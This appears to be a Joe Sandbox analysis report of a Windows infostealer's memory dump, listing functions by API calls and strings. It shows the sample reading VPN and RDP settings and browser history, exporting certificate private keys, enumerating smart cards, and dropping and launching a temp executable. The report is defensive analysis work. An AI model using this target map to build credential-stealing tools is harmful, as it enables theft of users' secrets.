Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
Instruction ID: e95a14f2eeae5433aae0cdb299c80c805a0bfba740db4418c971663996329975
Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
Instruction Fuzzy Hash: F4D05E46E08482A2DA317B04980B036A6A1BF50308FE00231C19E026E1EF6CA689DA25

Non-executed Functions

Function 00007FF780B6DC08 Relevance: 54.7, APIs: 16, Strings: 15, Instructions: 436filestringCOMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI ref: 00007FF780B6DD8A
PathFileExistsW.SHLWAPI ref: 00007FF780B6DD94
PathQuoteSpacesW.SHLWAPI ref: 00007FF780B6DDA6
lstrcatW.KERNEL32 ref: 00007FF780B6DDBF
GetEnvironmentVariableW.KERNEL32 ref: 00007FF780B6DF4C
PathAppendW.SHLWAPI ref: 00007FF780B6DF7B
PathFileExistsW.SHLWAPI ref: 00007FF780B6DF88
CreateFileW.KERNEL32 ref: 00007FF780B6DFB8
GetFileSize.KERNEL32 ref: 00007FF780B6DFD0
ReadFile.KERNEL32 ref: 00007FF780B6DFF8

Part of subcall function 00007FF780B6CF1C: lstrlenA.KERNEL32 ref: 00007FF780B6CF2F

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

GetEnvironmentVariableW.KERNEL32 ref: 00007FF780B6E275
PathAppendW.SHLWAPI ref: 00007FF780B6E29E
PathFileExistsW.SHLWAPI ref: 00007FF780B6E2AB
CreateFileW.KERNEL32 ref: 00007FF780B6E2DB
GetFileSize.KERNEL32 ref: 00007FF780B6E2F3

Part of subcall function 00007FF780B62588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF780B6CD49), ref: 00007FF780B62595

ReadFile.KERNEL32 ref: 00007FF780B6E31F

Strings

</DefaultHostName>, xrefs: 00007FF780B6E0E9
Software\Fortinet\FortiClient\Sslvpn\Tunnels, xrefs: 00007FF780B6DCBA
<DefaultHostName>, xrefs: 00007FF780B6E0C2
<DefaultUser>, xrefs: 00007FF780B6E029
"user": ", xrefs: 00007FF780B6E01A
Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles, xrefs: 00007FF780B6DEDF
", "group": ", xrefs: 00007FF780B6E138
]},, xrefs: 00007FF780B6E233
Software\SonicWall\SSL-VPN NetExtender\Standalone, xrefs: 00007FF780B6DD59
</DefaultGroup>, xrefs: 00007FF780B6E17D
", "host": ", xrefs: 00007FF780B6E0A4
Software\Microsoft\Terminal Server Client\Servers, xrefs: 00007FF780B6E213
}},, xrefs: 00007FF780B6E1E3
<DefaultGroup>, xrefs: 00007FF780B6E156
</DefaultUser>, xrefs: 00007FF780B6E055

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
API String ID: 2508640211-1951492331
Opcode ID: bb7d15e3086eb18682641ca85572dad04f967e087e63031bb7c042d0c4f9d4dc
Instruction ID: 3ab49ecdbfbcbd3529b2317df4c83b15d2c7893a8554f789ff76c0f5824a2a45
Opcode Fuzzy Hash: bb7d15e3086eb18682641ca85572dad04f967e087e63031bb7c042d0c4f9d4dc
Instruction Fuzzy Hash: 7312A029A1868249EB10FB65DC542F9AB61BF81784FE44431DA2F47BDADF2CF505C720

Function 00007FF780B63220 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 313encryptionmemorylibraryCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B6325E
CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF780B6328D
CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B632BB

Part of subcall function 00007FF780B636F0: CryptExportKey.ADVAPI32 ref: 00007FF780B63744
Part of subcall function 00007FF780B636F0: CryptExportKey.ADVAPI32 ref: 00007FF780B6379E

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63336
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63380
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B633AC
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B633DC
CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B63404
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B6341C
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B6343F
CryptAcquireContextA.ADVAPI32 ref: 00007FF780B63459
CryptImportKey.ADVAPI32 ref: 00007FF780B6347E
OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B634B5
OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63505
QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63523
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63532
ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B6355D
ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B6357C
WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B6359F
NCryptExportKey.NCRYPT ref: 00007FF780B63605
CertOpenStore.CRYPT32 ref: 00007FF780B63667
CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF780B63682
CertSetCertificateContextProperty.CRYPT32 ref: 00007FF780B6369E
PFXExportCertStoreEx.CRYPT32 ref: 00007FF780B636BD
PFXExportCertStoreEx.CRYPT32 ref: 00007FF780B636DF

Strings

/.2x, xrefs: 00007FF780B632FB
Microsoft Software Key Storage Provider, xrefs: 00007FF780B6360D
ioyn, xrefs: 00007FF780B632F2
CAPIPRIVATEBLOB, xrefs: 00007FF780B635AF, 00007FF780B635DE, 00007FF780B63622
7+D, xrefs: 00007FF780B634C7

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
String ID: /.2x$7+D$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$ioyn
API String ID: 2161712720-1498425709
Opcode ID: 204ad4d0df6e6ae5abe84d6b40ec66ba03013ccc2c8b7144010a1f3a186aa803
Instruction ID: db7d9ce8969807c2c8ffeac641a6584e38ebc8faea07c58fdf14257472baf8db
Opcode Fuzzy Hash: 204ad4d0df6e6ae5abe84d6b40ec66ba03013ccc2c8b7144010a1f3a186aa803
Instruction Fuzzy Hash: 4CE15B36B14A818AE710DFA5E8457EDB7A1BB48B88F904136DE4E17B88DF3CE149C750

Function 00007FF780B6213C Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

WinHttpOpen.WINHTTP ref: 00007FF780B6218D

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

WinHttpCrackUrl.WINHTTP ref: 00007FF780B621D8
WinHttpConnect.WINHTTP ref: 00007FF780B62213
WinHttpOpenRequest.WINHTTP ref: 00007FF780B622A8
WinHttpQueryOption.WINHTTP ref: 00007FF780B622E0
WinHttpSetOption.WINHTTP ref: 00007FF780B622FC
WinHttpSendRequest.WINHTTP ref: 00007FF780B6231D
WinHttpReceiveResponse.WINHTTP ref: 00007FF780B62330
WinHttpQueryDataAvailable.WINHTTP ref: 00007FF780B62359
WinHttpReadData.WINHTTP ref: 00007FF780B62381
WinHttpCloseHandle.WINHTTP ref: 00007FF780B624C7
WinHttpCloseHandle.WINHTTP ref: 00007FF780B624D0
WinHttpCloseHandle.WINHTTP ref: 00007FF780B624E0

Strings

>p9p, xrefs: 00007FF780B62241
=p"p, xrefs: 00007FF780B62265
=p"p, xrefs: 00007FF780B62440

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
String ID: =p"p$=p"p$>p9p
API String ID: 199669925-890668147
Opcode ID: 0fc138027327edf48a57905c87577208240823e72abb7732a7634aa4fde25a18
Instruction ID: 5f3a684d65055b36577257c00cc2c89f0510956707b248d7f7dfe4ab1fd243f3
Opcode Fuzzy Hash: 0fc138027327edf48a57905c87577208240823e72abb7732a7634aa4fde25a18
Instruction Fuzzy Hash: 63A10776B187818AEB10EF6698441ADBBA1FB85B84FA44035DF5E47B85DF3CE405CB20

Function 00007FF780B6FB34 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65stringfileCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF780B6FB65
lstrcatW.KERNEL32 ref: 00007FF780B6FB72
lstrcpyW.KERNEL32 ref: 00007FF780B6FB83
lstrcatW.KERNEL32 ref: 00007FF780B6FB97
FindFirstFileW.KERNEL32 ref: 00007FF780B6FBAB
lstrcatW.KERNEL32 ref: 00007FF780B6FBC9
lstrcatW.KERNEL32 ref: 00007FF780B6FBDA
FindClose.KERNEL32 ref: 00007FF780B6FBE3

Part of subcall function 00007FF780B6FF38: lstrlenW.KERNEL32 ref: 00007FF780B6FF5E
Part of subcall function 00007FF780B6FF38: lstrlenW.KERNEL32 ref: 00007FF780B6FF7A
Part of subcall function 00007FF780B6FF38: WideCharToMultiByte.KERNEL32 ref: 00007FF780B6FFA3
Part of subcall function 00007FF780B6FF38: PathFileExistsA.SHLWAPI ref: 00007FF780B6FFAC
Part of subcall function 00007FF780B6FF38: OpenFile.KERNEL32 ref: 00007FF780B6FFC5
Part of subcall function 00007FF780B6FF38: GetFileSize.KERNEL32 ref: 00007FF780B6FFE5
Part of subcall function 00007FF780B6FF38: CreateFileMappingA.KERNEL32 ref: 00007FF780B7001C
Part of subcall function 00007FF780B6FF38: MapViewOfFile.KERNEL32 ref: 00007FF780B7003D
Part of subcall function 00007FF780B6FF38: __memcpy.DELAYIMP ref: 00007FF780B7004F
Part of subcall function 00007FF780B6FF38: UnmapViewOfFile.KERNEL32 ref: 00007FF780B7005A
Part of subcall function 00007FF780B6FF38: CloseHandle.KERNEL32 ref: 00007FF780B70063
Part of subcall function 00007FF780B6FF38: CloseHandle.KERNEL32 ref: 00007FF780B7006C

Part of subcall function 00007FF780B6F27C: __memcpy.DELAYIMP ref: 00007FF780B6F29A

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

Strings

*.default-release, xrefs: 00007FF780B6FB89
\places.sqlite, xrefs: 00007FF780B6FBCF
APPDATA, xrefs: 00007FF780B6FB5E

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
String ID: *.default-release$APPDATA$\places.sqlite
API String ID: 4154822446-3438982840
Opcode ID: e65e7b83617ab43540fe00d47d34ac815f55c605aef4560ecc047bbf39011d3b
Instruction ID: 64964c95e65dbee63227d326bf2d256695a0a772edbfe19abb22f0aa60eb22e5
Opcode Fuzzy Hash: e65e7b83617ab43540fe00d47d34ac815f55c605aef4560ecc047bbf39011d3b
Instruction Fuzzy Hash: C231C521A1894795EF10EF18EC441E8A720FB44794FD05031DA5F47BD8EF6CE609C760

Function 00007FF780B6B424 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 310COMMON

Download Yara Rule

APIs

SCardGetStatusChangeW.WINSCARD ref: 00007FF780B6B53B
SCardListCardsW.WINSCARD ref: 00007FF780B6B5E3
SCardFreeMemory.WINSCARD ref: 00007FF780B6B67A
SCardListCardsW.WINSCARD ref: 00007FF780B6B7A2
SCardFreeMemory.WINSCARD ref: 00007FF780B6B837

Strings

%02X, xrefs: 00007FF780B6B587
"_": "", xrefs: 00007FF780B6B452

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Card$CardsFreeListMemory$ChangeStatus
String ID: "_": ""$%02X
API String ID: 2879528921-1880646522
Opcode ID: ed9f32e50c8f5160b7ce924a75e09b74c906d36f2cf7978b60ed95eb74a4cc79
Instruction ID: 53e67d40098c5ce5e47b045f19d6fa85db67e4fd1c18d28416b7b860c5843c81
Opcode Fuzzy Hash: ed9f32e50c8f5160b7ce924a75e09b74c906d36f2cf7978b60ed95eb74a4cc79
Instruction Fuzzy Hash: A2D14C2AB0860249EA14FF669C610F9AB65BF457C4BE86831ED2F467C6DE2CF505C320

Function 00007FF780B678EC Relevance: 6.1, APIs: 4, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF780B6797A
GetProcAddress.KERNEL32 ref: 00007FF780B67986
GetCurrentProcess.KERNEL32 ref: 00007FF780B67995
IsWow64Process.KERNEL32 ref: 00007FF780B679A3

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Process$AddressCurrentLibraryLoadProcWow64
String ID:
API String ID: 4035193891-0
Opcode ID: 365d01090172dbda6ca06dd5cbaea7123b8a2612a02b7e1af0e56df8b66fc6ac
Instruction ID: bef2979e37798b7ceb4265e7ebe903f8dedc8aa955612e22f1f207ac838dccca
Opcode Fuzzy Hash: 365d01090172dbda6ca06dd5cbaea7123b8a2612a02b7e1af0e56df8b66fc6ac
Instruction Fuzzy Hash: 0921F9A6A187C187EF106F69AC0417AEB90FB48780FA45134DA9E06BC6DF2CE104CB20

Function 00007FF780B636F0 Relevance: 3.1, APIs: 2, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptExportKey.ADVAPI32 ref: 00007FF780B63744
CryptExportKey.ADVAPI32 ref: 00007FF780B6379E

Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: CryptExport$HeapProcess
String ID:
API String ID: 532797600-0
Opcode ID: 7e4aefc5a259160d3bd96176410f5e013c34f79a57299891ee72d5de0e9a384b
Instruction ID: 42670218d33d4b9d92caac398c9f96d71b7ff73862e62373576fc1e7765b3fbf
Opcode Fuzzy Hash: 7e4aefc5a259160d3bd96176410f5e013c34f79a57299891ee72d5de0e9a384b
Instruction Fuzzy Hash: C021B276A19A4292EB50EF15F851779B7A0FB84B98F908230EA5E477D4DF3CE901CB10

Function 00007FF780B6FF38 Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 00007FF780B6FF5E

Part of subcall function 00007FF780B62588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF780B6CD49), ref: 00007FF780B62595

lstrlenW.KERNEL32 ref: 00007FF780B6FF7A
WideCharToMultiByte.KERNEL32 ref: 00007FF780B6FFA3
PathFileExistsA.SHLWAPI ref: 00007FF780B6FFAC
OpenFile.KERNEL32 ref: 00007FF780B6FFC5

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

GetFileSize.KERNEL32 ref: 00007FF780B6FFE5

Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5

CreateFileMappingA.KERNEL32 ref: 00007FF780B7001C
MapViewOfFile.KERNEL32 ref: 00007FF780B7003D
__memcpy.DELAYIMP ref: 00007FF780B7004F
UnmapViewOfFile.KERNEL32 ref: 00007FF780B7005A
CloseHandle.KERNEL32 ref: 00007FF780B70063
CloseHandle.KERNEL32 ref: 00007FF780B7006C

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
String ID:
API String ID: 2161876737-0
Opcode ID: d5ee2c10b23df17e05a64801aa7ea52e0ea5830c1dc78b399929b37101156a70
Instruction ID: 5dcc0da950f1b5e1df9b7a3665b6c8ce1cac236ec40a60b2875f47005ee4bc57
Opcode Fuzzy Hash: d5ee2c10b23df17e05a64801aa7ea52e0ea5830c1dc78b399929b37101156a70
Instruction Fuzzy Hash: 4131C721A18A4287E720EB2AAC1C739AA90FB48BE0F944635DD5F47BD4DF3CE445C710

Function 00007FF780B61CBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65filetimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32 ref: 00007FF780B61CF7
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF780B61D04
wsprintfA.USER32 ref: 00007FF780B61D1C
CreateFileA.KERNEL32 ref: 00007FF780B61D56
WriteFile.KERNEL32 ref: 00007FF780B61D88
CloseHandle.KERNEL32 ref: 00007FF780B61DA9
ShellExecuteA.SHELL32 ref: 00007FF780B61DCE

Strings

%08X.exe, xrefs: 00007FF780B61D11
open, xrefs: 00007FF780B61DC2

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
String ID: %08X.exe$open
API String ID: 2307396689-1771423410
Opcode ID: 5ca8c4d93bbcac26c49b5db9cd55d20708d169f99a7b767ef2df99b98dd97959
Instruction ID: 5ba5d762a0cb704d9f0db5da7cf633d0d546e93ac0df2d79c77762bf11c392b4
Opcode Fuzzy Hash: 5ca8c4d93bbcac26c49b5db9cd55d20708d169f99a7b767ef2df99b98dd97959
Instruction Fuzzy Hash: 233197726189819BE720DF64EC887E96721FB84788FD04135DA4E46A98CF7CD60DC720

Function 00007FF780B6F984 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96stringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF780B6FA58
lstrcatW.KERNEL32 ref: 00007FF780B6FA68
lstrcatW.KERNEL32 ref: 00007FF780B6FA78
lstrcatW.KERNEL32 ref: 00007FF780B6FA8C

Part of subcall function 00007FF780B6FF38: lstrlenW.KERNEL32 ref: 00007FF780B6FF5E
Part of subcall function 00007FF780B6FF38: lstrlenW.KERNEL32 ref: 00007FF780B6FF7A
Part of subcall function 00007FF780B6FF38: WideCharToMultiByte.KERNEL32 ref: 00007FF780B6FFA3
Part of subcall function 00007FF780B6FF38: PathFileExistsA.SHLWAPI ref: 00007FF780B6FFAC
Part of subcall function 00007FF780B6FF38: OpenFile.KERNEL32 ref: 00007FF780B6FFC5
Part of subcall function 00007FF780B6FF38: GetFileSize.KERNEL32 ref: 00007FF780B6FFE5
Part of subcall function 00007FF780B6FF38: CreateFileMappingA.KERNEL32 ref: 00007FF780B7001C
Part of subcall function 00007FF780B6FF38: MapViewOfFile.KERNEL32 ref: 00007FF780B7003D
Part of subcall function 00007FF780B6FF38: __memcpy.DELAYIMP ref: 00007FF780B7004F
Part of subcall function 00007FF780B6FF38: UnmapViewOfFile.KERNEL32 ref: 00007FF780B7005A
Part of subcall function 00007FF780B6FF38: CloseHandle.KERNEL32 ref: 00007FF780B70063
Part of subcall function 00007FF780B6FF38: CloseHandle.KERNEL32 ref: 00007FF780B7006C

Part of subcall function 00007FF780B6F27C: __memcpy.DELAYIMP ref: 00007FF780B6F29A

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

lstrlenW.KERNEL32 ref: 00007FF780B6FAFB

Strings

LOCALAPPDATA, xrefs: 00007FF780B6FA51
\History, xrefs: 00007FF780B6FA7E
Default, xrefs: 00007FF780B6F9A6

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
String ID: Default$LOCALAPPDATA$\History
API String ID: 3980575106-3555721359
Opcode ID: 3e70a395a46a2af505291de9ab1fd73a1e68383478261f10fbcbd77587007c23
Instruction ID: 70951e0d433648e9dc40930cb9f716a6e92caa5e6c4c17b1f908acf7e8bd4971
Opcode Fuzzy Hash: 3e70a395a46a2af505291de9ab1fd73a1e68383478261f10fbcbd77587007c23
Instruction Fuzzy Hash: E4514326E18F8683E750DF28D9052A87770FB98788F95A221DB9D53756EF34E6C8C310

Function 00007FF780B6FC6C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF780B6FC85
CoCreateInstance.OLE32 ref: 00007FF780B6FCA8
CoUninitialize.OLE32 ref: 00007FF780B6FDBF

Strings

http, xrefs: 00007FF780B6FD6A

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: http
API String ID: 948891078-2541227442
Opcode ID: 18e9702a5a47cce39de5a06ec3fe168a99fd15f0ec2ec8a116290c48367eeb9f
Instruction ID: e5761aa221edabc51f4bcc549751a006e42050c7320d0cfc9a6689c4e93ca9f1
Opcode Fuzzy Hash: 18e9702a5a47cce39de5a06ec3fe168a99fd15f0ec2ec8a116290c48367eeb9f
Instruction Fuzzy Hash: 68415336608A429AE720AF75E8553ADABA0FB84B88F944135DA0E4ABD4DF3CF144C714

